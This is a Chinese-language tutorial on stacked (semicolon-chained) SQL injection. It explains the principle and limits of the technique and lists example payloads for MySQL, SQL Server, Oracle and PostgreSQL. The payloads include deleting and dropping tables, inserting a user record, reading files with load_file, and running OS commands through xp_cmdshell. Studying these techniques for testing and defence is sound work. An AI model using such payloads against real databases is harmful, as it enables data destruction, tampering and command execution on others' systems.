Stacked injection--堆叠注入--堆查询注入

Stacked injection--堆叠注入--堆查询注入

原文地址;http://www.sqlinjection.net/stacked-queries/   本篇属于集合原作者的思路和个人想法结合的一篇产物。Stacked injection 汉语翻译过来后，国内有的称为堆查询注入，也有称之为堆叠注入。个人认为称之为堆叠注入更为准确。堆叠注入为攻击者提供了很多的攻击手段，通过添加一个新 的查询或者终止查询，可以达到修改数据和调用存储过程的目的。这种技术在SQL注入中还是比较频繁的。

0x01 原理介绍

在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为：（因未对输入的参数进行过滤）Select * from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。

0x02 堆叠注入的局限性

堆叠注入的局限性在于并不是每一个环境下都可以执行，可能受到API或者数据库引擎不支持的限制，当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。

Ps：此图是从原文中截取过来的，因为我个人的测试环境是php+mysql，是可以执行的，此处对于mysql/php存在质疑。但个人估计原文作者可能与我的版本的不同的原因。虽然我们前面提到了堆叠查询可以执行任意的sql语句，但是这种注入方式并不是十分的完美的。在我们的web系统中，因为代码通常只返回一个查询结果，因此，堆叠注入第二个语句产生错误或者结果只能被忽略，我们在前端界面是无法看到返回结果的。因此，在读取数据时，我们建议使用union（联合）注入。同时在使用堆叠注入之前，我们也是需要知道一些数据库相关信息的，例如表名，列名等信息。

0x03 各个数据库实例介绍

本节我们从常用数据库角度出发，介绍几个类型的数据库的相关用法。数据库的基本操作，增删查改。以下列出数据库相关堆叠注入的基本操作。

1. 一. Mysql

（1）新建一个表 select * from users where id=1;create table test like users;

执行成功，我们再去看一下是否新建成功表。

1. 2. 删除上面新建的test表select * from users where id=1;drop table test;

1. 3. 查询数据select * from users where id=1;select 1,2,3;

加载文件  select * from users where id=1;select load_file('c:/tmpupbbn.php');

1. 4. 修改数据select * from users where id=1;insert into users(id,username,password)

values('100','new','new');

1. 二. Sql server

1. 1. 增加数据表select * from test;create table sc3(ss CHAR(8));

1. 2. 删除数据表select * from test;drop table sc3;

(3)查询数据select 1,2,3;select * from test;

1. 4. 修改数据select * from test;update test set name='test' where id=3;

1. 5. sqlserver中最为重要的存储过程的执行

select * from test where id=1;exec master..xp_cmdshell 'ipconfig'

1. 三. Oracle

上面的介绍中我们已经提及，oracle不能使用堆叠注入，可以从图中看到，当有两条语句在同一行时，直接报错。无效字符。后面的就不往下继续尝试了。

1. 四. Postgresql

1. 1. 新建一个表    select * from user_test;create table user_data(id DATE);

可以看到user_data表已经建好。

1. 2. 删除上面新建的user_data表select * from user_test;delete from user_data;

1. 3. 查询数据select * from user_test;select 1,2,3;

1. 4. 修改数据 select * from user_test;update user_test set name='modify' where name='张三';